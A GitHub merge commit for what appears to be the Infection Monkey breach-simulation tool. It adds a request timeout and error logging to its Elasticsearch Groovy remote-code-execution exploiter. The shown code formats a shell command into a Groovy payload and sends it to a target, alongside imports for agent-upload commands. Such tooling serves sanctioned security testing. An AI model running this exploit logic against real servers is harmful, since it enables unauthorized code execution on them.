Merge pull request #289 from VakarisZ/elastic_small_fix

Added request timeout to elastic exploiter
This commit is contained in:
Daniel Goldberg 2019-04-10 10:30:19 +03:00 committed by GitHub
commit 6b9f3c18bc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 3 deletions

View File

@ -8,7 +8,8 @@ import json
import logging import logging
import requests import requests
from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX from infection_monkey.model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX,\
DOWNLOAD_TIMEOUT
from infection_monkey.network.elasticfinger import ES_PORT, ES_SERVICE from infection_monkey.network.elasticfinger import ES_PORT, ES_SERVICE
import re import re
@ -47,7 +48,11 @@ class ElasticGroovyExploiter(WebRCE):
def exploit(self, url, command): def exploit(self, url, command):
command = re.sub(r"\\", r"\\\\\\\\", command) command = re.sub(r"\\", r"\\\\\\\\", command)
payload = self.JAVA_CMD % command payload = self.JAVA_CMD % command
response = requests.get(url, data=payload) try:
response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
except requests.ReadTimeout:
LOG.error("Elastic couldn't upload monkey, because server didn't respond to upload request.")
return False
result = self.get_results(response) result = self.get_results(response)
if not result: if not result:
return False return False